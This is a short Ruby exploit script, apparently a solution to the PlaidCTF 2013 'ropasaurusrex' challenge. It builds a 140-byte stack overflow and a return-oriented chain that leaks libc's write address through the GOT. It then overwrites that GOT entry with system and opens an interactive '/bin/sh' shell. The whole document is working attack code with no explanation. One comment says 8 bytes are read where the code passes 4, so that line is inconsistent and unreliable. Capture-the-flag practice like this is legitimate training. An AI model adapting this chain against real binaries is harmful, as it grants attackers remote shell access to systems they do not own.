PlaidCTF2013 ropasaurusrex

1. require '../pwnlib.rb'
2.  
3. def p32(x)
4.   [x].pack("L")
5. end
6.  
7. PwnTube.open("localhost", 1025) do |tube|
8.  
9.   #tube.debug = true
10.  
11.   data     = p32(0x8049620)
12.   pop3ret  = p32(0x80484b6)
13.   pltread  = p32(0x804832c)
14.   pltwrite = p32(0x804830c)
15.   gotwrite = p32(0x8049614) # <write@plt>: jmp DWORD PTR ds:0x8049614
16.  
17.   payload = "A" * 140
18.  
19.   # write(STDOUT, gotwrite, 4)
20.   payload << [pltwrite, pop3ret, p32(1), gotwrite, p32(4)].join("")
21.  
22.   # read(STDIN, data, 8)
23.   payload << [pltread, pop3ret, p32(0), data, p32(4)].join("")
24.  
25.   # read(STDIN, gotwrite, 4)
26.   payload << [pltread, pop3ret, p32(0), gotwrite, p32(4)].join("")
27.  
28.   # write(data) => system("/bin/sh")
29.   payload << [pltwrite, "AAAA", data].join("")
30.  
31.   tube.send("#{payload}\n")
32.   libc_write  = tube.recv
33.   libc_write = "0x#{libc_write.unpack("L")[0].to_s(16)}"
34.   libc_base   = libc_write.to_i(16) - 0xd9510 #local write offset
35.   libc_system = libc_base  + 0x3fcd0 #local system offset
36.  
37.   tube.send("/bin/sh\x00\n")
38.   tube.send(p32(libc_system) + "\n")
39.   tube.recv
40.   tube.interactive
41.  
42. end